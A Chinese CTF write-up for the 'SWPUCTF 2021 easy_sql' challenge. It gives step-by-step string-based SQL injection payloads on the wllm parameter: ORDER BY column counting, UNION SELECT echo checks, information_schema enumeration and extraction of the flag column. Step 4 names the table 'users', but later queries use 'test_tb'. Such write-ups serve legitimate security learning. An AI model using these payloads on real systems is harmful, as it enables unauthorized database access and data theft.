字符型注入([SWPUCTF 2021 新生赛]easy_sql)

拿到题目,查看源码,可知是要输入参数wllm。

输入参数/?wllm=1,得到会显

继续输入参数/?wllm=1',报错,确定为字符型漏洞

1.查看字段列表,发现在字段4报错,确定为3列

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+

2.查看回显

?wllm=-1' union select 1,2,3--+

3.查询数据库名(test_db)

?wllm=-1' union select 1,2,database()--+

字符型注入([SWPUCTF 2021 新生赛]easy_sql)_第1张图片

4.查看test_db库的表(users)

?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

字符型注入([SWPUCTF 2021 新生赛]easy_sql)_第2张图片

5.查询字段

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+

字符型注入([SWPUCTF 2021 新生赛]easy_sql)_第3张图片

6.出现flag字段,查看flag字段的内容

/?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+ 

出现flag字段,成功解出

你可能感兴趣的:(sql,数据库,web安全,安全)